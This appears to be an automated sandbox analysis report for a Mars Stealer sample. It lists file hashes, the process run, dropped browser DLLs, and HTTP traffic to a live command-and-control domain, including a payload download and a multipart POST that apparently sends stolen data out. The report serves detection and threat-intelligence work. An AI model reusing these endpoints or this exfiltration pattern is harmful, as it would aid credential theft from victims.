Analysis

  • max time kernel: 122s
  • max time network: 123s
  • platform: windows7_x64
  • resource: win7-20240220-en
  • resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted: 24/03/2024, 10:11 UTC

General

  • Target: 1524f984753f60aa2b865ef86b79a58b.exe
  • Size: 159KB
  • MD5: 1524f984753f60aa2b865ef86b79a58b
  • SHA1: 07579a5c92e8cc92e3f391a5460d6de74310883b
  • SHA256: 6e2f1f2570bb49a0ff0e8b7e781f03d6e7f78798afe053ae373842ec42712702
  • SHA512: 8d8d34812091935ad4c90270d5df13c2a8e0f3f9a3a5752ba469a6d4972a36ea5696a087e47d65b1c13b36496e2fa87f0d99dd34119d5f3730ca9798db3855d2
  • SSDEEP: 3072:U53/H9YArDiGiDSDCosstkZtqJSp8Bb8EG:W3/WuDi3stJ8EG

Malware Config

Extracted

  • Family: marsstealer
  • Botnet: Default

Signatures

Processes

  • C:\Users\Admin\AppData\Local\Temp\1524f984753f60aa2b865ef86b79a58b.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\1524f984753f60aa2b865ef86b79a58b.exe"
    PID: 2768
    • Loads dropped DLL
    • Checks processor information in registry

Network

  • [US] DNS mars.mhsorteio.app.br
    Process: 1524f984753f60aa2b865ef86b79a58b.exe
    Remote address: 8.8.8.8:53
    Request: mars.mhsorteio.app.br IN A
    Response: mars.mhsorteio.app.br IN A 213.190.6.252
  • [US] GET http://mars.mhsorteio.app.br/APwpnHWkYh.php
    Process: 1524f984753f60aa2b865ef86b79a58b.exe
    Remote address: 213.190.6.252:80
    Request:
      GET /APwpnHWkYh.php HTTP/1.1
      Host: mars.mhsorteio.app.br
      Connection: Keep-Alive
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Connection: Keep-Alive
      Keep-Alive: timeout=5, max=100
      x-powered-by: PHP/7.4.33
      set-cookie: PHPSESSID=09b3e3051450e1856422ac45ccc39a3b; path=/
      expires: Thu, 19 Nov 1981 08:52:00 GMT
      cache-control: no-store, no-cache, must-revalidate
      pragma: no-cache
      content-type: text/html; charset=UTF-8
      content-length: 244
      date: Sun, 24 Mar 2024 10:11:27 GMT
      server: LiteSpeed
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
  • [US] GET http://mars.mhsorteio.app.br/request
    Process: 1524f984753f60aa2b865ef86b79a58b.exe
    Remote address: 213.190.6.252:80
    Request:
      GET /request HTTP/1.1
      Host: mars.mhsorteio.app.br
      Cache-Control: no-cache
      Cookie: PHPSESSID=09b3e3051450e1856422ac45ccc39a3b
    Response:
      HTTP/1.1 200 OK
      Connection: Keep-Alive
      Keep-Alive: timeout=5, max=100
      last-modified: Thu, 21 Mar 2024 12:30:39 GMT
      accept-ranges: bytes
      content-length: 2685679
      date: Sun, 24 Mar 2024 10:11:27 GMT
      server: LiteSpeed
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
  • [US] POST http://mars.mhsorteio.app.br/APwpnHWkYh.php
    Process: 1524f984753f60aa2b865ef86b79a58b.exe
    Remote address: 213.190.6.252:80
    Request:
      POST /APwpnHWkYh.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----OHLNY58Q9RQIE3E3
      Host: mars.mhsorteio.app.br
      Content-Length: 60551
      Connection: Keep-Alive
      Cache-Control: no-cache
      Cookie: PHPSESSID=09b3e3051450e1856422ac45ccc39a3b
    Response:
      HTTP/1.1 200 OK
      Connection: Keep-Alive
      Keep-Alive: timeout=5, max=100
      x-powered-by: PHP/7.4.33
      expires: Thu, 19 Nov 1981 08:52:00 GMT
      cache-control: no-store, no-cache, must-revalidate
      pragma: no-cache
      content-type: text/html; charset=UTF-8
      content-length: 0
      date: Sun, 24 Mar 2024 10:11:36 GMT
      server: LiteSpeed
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
  • 213.190.6.252:80 (http): http://mars.mhsorteio.app.br/APwpnHWkYh.php
    Process: 1524f984753f60aa2b865ef86b79a58b.exe
    Bytes sent: 138.7kB; bytes received: 2.8MB; packets sent: 1541; packets received: 2001
    HTTP requests (each answered with 200):
      GET http://mars.mhsorteio.app.br/APwpnHWkYh.php
      GET http://mars.mhsorteio.app.br/request
      POST http://mars.mhsorteio.app.br/APwpnHWkYh.php
  • 8.8.8.8:53 (dns): mars.mhsorteio.app.br
    Process: 1524f984753f60aa2b865ef86b79a58b.exe
    Bytes sent: 67 B; bytes received: 83 B; packets sent: 1; packets received: 1
    DNS request: mars.mhsorteio.app.br
    DNS response: 213.190.6.252

MITRE ATT&CK Enterprise v15


Downloads

  • \ProgramData\mozglue.dll
    Filesize: 593KB
    MD5: c8fd9be83bc728cc04beffafc2907fe9
    SHA1: 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
    SHA256: ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
    SHA512: fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
  • \ProgramData\nss3.dll
    Filesize: 2.0MB
    MD5: 1cc453cdf74f31e4d913ff9c10acdde2
    SHA1: 6e85eae544d6e965f15fa5c39700fa7202f3aafe
    SHA256: ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
    SHA512: dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
  • memory/2768-0-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize: 244KB
  • memory/2768-1-0x0000000061E00000-0x0000000061EF3000-memory.dmp
    Filesize: 972KB
  • memory/2768-50-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize: 244KB
